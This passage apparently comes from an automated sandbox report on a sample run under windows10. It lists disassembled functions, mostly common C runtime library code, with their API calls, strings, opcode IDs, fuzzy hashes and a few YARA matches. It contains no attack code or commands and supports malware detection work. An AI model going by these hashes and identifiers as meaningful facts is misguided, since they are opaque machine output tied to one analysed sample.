                                                                      • Opcode Fuzzy Hash: 4e2fac74f183a0bdaeb81c39fa4a1a7caa1bcb1f63f0039fea8e759a22399ee3
                                                                      • Instruction Fuzzy Hash: 6241493040CF158BC719DA2DE9DA9BBF7E5EB85311F60472ED5DB83092D3286617CA82
                                                                      Function 00DDF18A Relevance: 16.9, APIs: 11, Instructions: 356COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000100,?,?,?,?,?,?), ref: 00DDF25A
                                                                      • _malloc.LIBCMT ref: 00DDF293
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,?,00000000,00DD9E02,?,?), ref: 00DDF2C6
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00DD9E02,?,?), ref: 00DDF2E2
                                                                      • MultiByteToWideChar.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00DDF31C
                                                                      • _malloc.LIBCMT ref: 00DDF355
                                                                      • __freea.LIBCMT ref: 00DDF3AD
                                                                      • __freea.LIBCMT ref: 00DDF3B6
                                                                      • _malloc.LIBCMT ref: 00DDF46B
                                                                      • _memset.LIBCMT ref: 00DDF48D
                                                                      • __freea.LIBCMT ref: 00DDF4D8
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$__freea_malloc$_memset
                                                                      • String ID:
                                                                      • API String ID: 3920393152-0
                                                                      • Opcode ID: 78f2b261489d81dc67da15cae015f47074221d597052c3210b6fe4f0505e4557
                                                                      • Instruction ID: 35bbb2e4f4cbf86282dc57895059c903e7056ff1b2c3bff2492ee5e9e56f2a10
                                                                      • Opcode Fuzzy Hash: 78f2b261489d81dc67da15cae015f47074221d597052c3210b6fe4f0505e4557
                                                                      • Instruction Fuzzy Hash: 15C18B7280015AEFCF21AFA4DC818AE7BA9EF48354B19453BF946A6360D731CD91DB70
                                                                      Function 00DDB99D Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 114COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • TlsSetValue.KERNEL32(00000000,?,?,00DDA861), ref: 00DDBA60
                                                                      • __init_pointers.LIBCMT ref: 00DDBA6A
                                                                      • __mtterm.LIBCMT ref: 00DDBB20
                                                                        • Part of subcall function 00DDB649: TlsFree.KERNEL32(00DEC65C,00DDA8F6), ref: 00DDB674
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: FreeValue__init_pointers__mtterm
                                                                      • String ID: FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                      • API String ID: 3928193026-1030280904
                                                                      • Opcode ID: a6a817d6a2310d2eac4f6c13956bcc307583335e20840f2ec44ea4596386d2f0
                                                                      • Instruction ID: dd22009c5e8ae079ec664e6d20e0e8559c7a4aacc637bcff7b88364857e4ddd2
                                                                      • Opcode Fuzzy Hash: a6a817d6a2310d2eac4f6c13956bcc307583335e20840f2ec44ea4596386d2f0
                                                                      • Instruction Fuzzy Hash: 01318D31840391DACB11BB75EC85A1A3BA4EB54378B1A853BE510CB3F1EB75C8428B71
                                                                      Function 00DE22D3 Relevance: 9.2, APIs: 6, Instructions: 180COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _strlen.LIBCMT ref: 00DE2355
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,00000000,00000000,?,?,?,?,?,00DDF75E), ref: 00DE2395
                                                                      • _malloc.LIBCMT ref: 00DE23A5
                                                                      • _memset.LIBCMT ref: 00DE23CD
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,00000000,?,?,?,?,?,00DDF75E,?), ref: 00DE23E4
                                                                      • __freea.LIBCMT ref: 00DE246C
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$__freea_malloc_memset_strlen
                                                                      • String ID:
                                                                      • API String ID: 3923921168-0
                                                                      • Opcode ID: be4d551d33c36eea7e6c63a34f385a49323da08bab55d5247cc83324d7c11a3a
                                                                      • Instruction ID: 10b4959cd59a7458fea595c2c6e96ae7ae77a1c03fa3125eb3c5a3ada5352564
                                                                      • Opcode Fuzzy Hash: be4d551d33c36eea7e6c63a34f385a49323da08bab55d5247cc83324d7c11a3a
                                                                      • Instruction Fuzzy Hash: 0F516F31900259AACF21AFA6DC44DFFBBB9EF99720F28411AF514A6290D7359C41CF70
                                                                      Function 00DDABAA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: String___crt$Type_memset
                                                                      • String ID:
                                                                      • API String ID: 1957702402-3916222277
                                                                      • Opcode ID: 4facfc0e34130c712d2ff623d8cbfbe7c870751cf2b616df665596082eb4f2bd
                                                                      • Instruction ID: ae8587ba7f3da10a8378874b6f466e86ccb32d4aae5ef14f71ec08e31068b31d
                                                                      • Opcode Fuzzy Hash: 4facfc0e34130c712d2ff623d8cbfbe7c870751cf2b616df665596082eb4f2bd
                                                                      • Instruction Fuzzy Hash: 3651247410479C5FDB228B2C9C94FFB7BE9DB05304F1884EAD5C68B282E2319A498F31
                                                                      Function 00DE4AC0 Relevance: 7.8, APIs: 5, Instructions: 263COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _ValidateScopeTableHandlers.LIBCMT ref: 00DE4BC1
                                                                      • __FindPESection.LIBCMT ref: 00DE4BDB
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: FindHandlersScopeSectionTableValidate
                                                                      • String ID:
                                                                      • API String ID: 876702719-0
                                                                      • Opcode ID: 810000f004f94c85e018f8a0ab1f527b30ccc731e129fcd6a8504954a44001f0
                                                                      • Instruction ID: 8249b7f543a05f6b8c85c463f424361b7a2182b7d465692690a86f9fca022743
                                                                      • Opcode Fuzzy Hash: 810000f004f94c85e018f8a0ab1f527b30ccc731e129fcd6a8504954a44001f0
                                                                      • Instruction Fuzzy Hash: AE91A432A003998BCB14EF5ADC8076DB7B5EB84714F5A4129E815DB3A1E735ED01CBB0
                                                                      Function 00DDF574 Relevance: 7.7, APIs: 5, Instructions: 170COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,00DDF75E,?,?,?), ref: 00DDF61A
                                                                      • _malloc.LIBCMT ref: 00DDF64F
                                                                        • Part of subcall function 00DE22D3: _strlen.LIBCMT ref: 00DE2355
                                                                        • Part of subcall function 00DE22D3: _memset.LIBCMT ref: 00DE23CD
                                                                        • Part of subcall function 00DE22D3: MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,00000000,?,?,?,?,?,00DDF75E,?), ref: 00DE23E4
                                                                      • _memset.LIBCMT ref: 00DDF66F
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,?,?,?,00000001), ref: 00DDF684
                                                                      • __freea.LIBCMT ref: 00DDF69C
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$_memset$__freea_malloc_strlen
                                                                      • String ID:
                                                                      • API String ID: 574822426-0
                                                                      • Opcode ID: 02c6371aab659a2b11b5820a5d96bc5da52c4fcdb63fb4d00fdad98462ab4119
                                                                      • Instruction ID: 78ef70250cf96a068c81dee3d8c4c660c7e54301fa5728fd53b8e4e12531796e
                                                                      • Opcode Fuzzy Hash: 02c6371aab659a2b11b5820a5d96bc5da52c4fcdb63fb4d00fdad98462ab4119
                                                                      • Instruction Fuzzy Hash: E2516C7250025AAFDF10AFA4DC81DAE3BA9EB14354B18443BFA06D7360D771DD608BB0
                                                                      Function 00DE4009 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __CreateFrameInfo.LIBCMT ref: 00DE4031
                                                                        • Part of subcall function 00DE3921: __getptd.LIBCMT ref: 00DE392F
                                                                        • Part of subcall function 00DE3921: __getptd.LIBCMT ref: 00DE393D
                                                                      • __getptd.LIBCMT ref: 00DE403B
                                                                        • Part of subcall function 00DDB7E6: __amsg_exit.LIBCMT ref: 00DDB7F6
                                                                      • __getptd.LIBCMT ref: 00DE4049
                                                                      • __getptd.LIBCMT ref: 00DE4057
                                                                      • __getptd.LIBCMT ref: 00DE4062
                                                                        • Part of subcall function 00DE39C6: __CallSettingFrame@12.LIBCMT ref: 00DE3A12
                                                                        • Part of subcall function 00DE412F: __getptd.LIBCMT ref: 00DE413E
                                                                        • Part of subcall function 00DE412F: __getptd.LIBCMT ref: 00DE414C
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit
                                                                      • String ID:
                                                                      • API String ID: 3174811152-0
                                                                      • Opcode ID: 00718d0e68132253fd1dc26ac8ec86370d79eb46a5bc2db11c5e977857a907f3
                                                                      • Instruction ID: cd598a2afd745ad6454b8920596fd8e949f781c0d581536c823e2a1c03338dd3
                                                                      • Opcode Fuzzy Hash: 00718d0e68132253fd1dc26ac8ec86370d79eb46a5bc2db11c5e977857a907f3
                                                                      • Instruction Fuzzy Hash: 4511E471C0434AEFDB00EFA4C985AAD7BB0FF04314F11806AE814A7252EB789A119F70
                                                                      Function 00AD8494 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 00AD84C3
                                                                      • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,00AD8540,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 00AD84F7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000AD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AD1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_ad1000_windows10.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InformationLogicalProcessor
                                                                      • String ID: GetLogicalProcessorInformation$kernel32.dll
                                                                      • API String ID: 1773637529-812649623
                                                                      • Opcode ID: 4530c332cd549a485110a2ce9b79bb96940393db82cbc586c8bf7026f35ed180
                                                                      • Instruction ID: 3b7bec0fde5e98bc8a64dab64e5f0f55e4c4f3466cb038813985b86e291e5fb6
                                                                      • Opcode Fuzzy Hash: 4530c332cd549a485110a2ce9b79bb96940393db82cbc586c8bf7026f35ed180
                                                                      • Instruction Fuzzy Hash: 9E11B2B1D44208BFEB10EBA4EE42B6DB7E8EF04B10F2444A7E40692381DF399A80C615
                                                                      Function 00AD8492 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 00AD84C3
                                                                      • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,00AD8540,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 00AD84F7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000AD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AD1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_ad1000_windows10.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InformationLogicalProcessor
                                                                      • String ID: GetLogicalProcessorInformation$kernel32.dll
                                                                      • API String ID: 1773637529-812649623
                                                                      • Opcode ID: 1e656101392fb9e3823d893838b269b172fbbffbf9b641bbf4f3e5127c996ed9
                                                                      • Instruction ID: 94edd6890efd377b01cd5041b6957d3daef5ef0a07bfb068d222d860e62fa5fe
                                                                      • Opcode Fuzzy Hash: 1e656101392fb9e3823d893838b269b172fbbffbf9b641bbf4f3e5127c996ed9
                                                                      • Instruction Fuzzy Hash: 7E01B5B0D44208BFEB10EBA4EE42A6DB7E8EF04B10F104567F416D7391EE79DE808614
                                                                      Function 00ADC860 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetThreadUILanguage.KERNEL32(?,00000000), ref: 00ADC871
                                                                      • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 00ADC8CF
                                                                      • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 00ADC92C
                                                                      • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 00ADC95F
                                                                        • Part of subcall function 00ADC81C: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,00ADC8DD), ref: 00ADC833
                                                                        • Part of subcall function 00ADC81C: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,00ADC8DD), ref: 00ADC850
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000AD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AD1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_ad1000_windows10.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Thread$LanguagesPreferred$Language
                                                                      • String ID:
                                                                      • API String ID: 2255706666-0
                                                                      • Opcode ID: c9c88f86ea3451557c1d0802225e59a3c9d9c7622679081cf5d1f4ff987b1866
                                                                      • Instruction ID: cbfb789c8842579ce11f35d3d915ee942519bbfefa3273eae2f4765b2bd2e4c5
                                                                      • Opcode Fuzzy Hash: c9c88f86ea3451557c1d0802225e59a3c9d9c7622679081cf5d1f4ff987b1866
                                                                      • Instruction Fuzzy Hash: 8B315A70E0021E9BDB10DFE8C895AAEB7B8FF04320F404266E566E7391DB749A04CB90
                                                                      Function 00DDB59A Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 48COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • TlsGetValue.KERNEL32(00000000,?,00DDB635), ref: 00DDB5AC
                                                                      • TlsGetValue.KERNEL32(00DEC658,?,00DDB635), ref: 00DDB5C3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID: DecodePointer$KERNEL32.DLL
                                                                      • API String ID: 3702945584-629428536
                                                                      • Opcode ID: 3136b23a42bb024e745d37c7689a5889e0022977e277cd961263bd0fbe642121
                                                                      • Instruction ID: ffd358f5f39bcf5b4e2f5c3ed42d1edc693ed3b69ad538ca8a28b0f220192295
                                                                      • Opcode Fuzzy Hash: 3136b23a42bb024e745d37c7689a5889e0022977e277cd961263bd0fbe642121
                                                                      • Instruction Fuzzy Hash: F701D420544795EBDB21AB7AEC45E9B3F988F023B871D0667FD04CB3A1DB21C90186F0
                                                                      Function 00DDB51F Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 41COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • TlsGetValue.KERNEL32(00000000,?,00DDB598,00000000,00DE273C,00DEF6D0,00000000,00000314,?,00DE0261,00DEF6D0,Microsoft Visual C++ Runtime Library,00012010), ref: 00DDB531
                                                                      • TlsGetValue.KERNEL32(00DEC658,?,00DDB598,00000000,00DE273C,00DEF6D0,00000000,00000314,?,00DE0261,00DEF6D0,Microsoft Visual C++ Runtime Library,00012010), ref: 00DDB548
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID: EncodePointer$KERNEL32.DLL
                                                                      • API String ID: 3702945584-3682587211
                                                                      • Opcode ID: 856051737404de8f13b99ad82ea5a1a6f969cf77f6c04d6c2450d07a0849cf42
                                                                      • Instruction ID: 50145bd1c3cc2baaa0d8501f9bc6961e42b7bc6e7a3c8fe8155674cfa34c11c4
                                                                      • Opcode Fuzzy Hash: 856051737404de8f13b99ad82ea5a1a6f969cf77f6c04d6c2450d07a0849cf42
                                                                      • Instruction Fuzzy Hash: 1EF04F30500256EA8B11BF39EC409AA3BA89B053B475A0167FD18DA7A0DB31DD4187F0
                                                                      Function 00DE3D9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: CallFrame@12Setting__getptd
                                                                      • String ID: j
                                                                      • API String ID: 3454690891-2137352139
                                                                      • Opcode ID: 897189d18653c473b9fdc1a94212da5d9a7baed4e9301db53569ff7429da2283
                                                                      • Instruction ID: 0a084e2395875ab7e38f10a51a342539080bda033fc2011f1c23e6e622efd3a7
                                                                      • Opcode Fuzzy Hash: 897189d18653c473b9fdc1a94212da5d9a7baed4e9301db53569ff7429da2283
                                                                      • Instruction Fuzzy Hash: BD118271904291DFCB12EF6AC8483ACBFB0FF05714F18468AE4946F183C375AA51CBA1
                                                                      Function 00DE43B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___BuildCatchObject.LIBCMT ref: 00DE43C9
                                                                        • Part of subcall function 00DE4324: ___BuildCatchObjectHelper.LIBCMT ref: 00DE435A
                                                                      • _UnwindNestedFrames.LIBCMT ref: 00DE43E0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                      • String ID: csm
                                                                      • API String ID: 3487967840-1018135373
                                                                      • Opcode ID: d7cfb688f90cc76fd5960e040264083c7c1c916bb07f4d54eefe1401d8d22a85
                                                                      • Instruction ID: 92f4a23a8a68ffc4756aee0c8bd14aed92ce9e66b2531cc699b6563f10b9cfff
                                                                      • Opcode Fuzzy Hash: d7cfb688f90cc76fd5960e040264083c7c1c916bb07f4d54eefe1401d8d22a85
                                                                      • Instruction Fuzzy Hash: A2014231000189BBCF12AF62CC46EEA3FAAEF08341F048014FD0816121D772E9B1EBB4
                                                                      Function 00DE412F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __getptd.LIBCMT ref: 00DE413E
                                                                        • Part of subcall function 00DDB7E6: __amsg_exit.LIBCMT ref: 00DDB7F6
                                                                      • __getptd.LIBCMT ref: 00DE414C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: __getptd$__amsg_exit
                                                                      • String ID: csm
                                                                      • API String ID: 1969926928-1018135373
                                                                      • Opcode ID: 9d7e085454ab6c2d7cb152083fa03de183894ad01705aed6babd743c65a25248
                                                                      • Instruction ID: 943cd32bffdbee09ee8809bbc1cdcd1df01da6c9c31e4abe57d365ab56c178ab
                                                                      • Opcode Fuzzy Hash: 9d7e085454ab6c2d7cb152083fa03de183894ad01705aed6babd743c65a25248
                                                                      • Instruction Fuzzy Hash: 5C014B358017859FDF34AFA7D4446ADB7B5AF24311F18446EE04056292CB309AC0DF71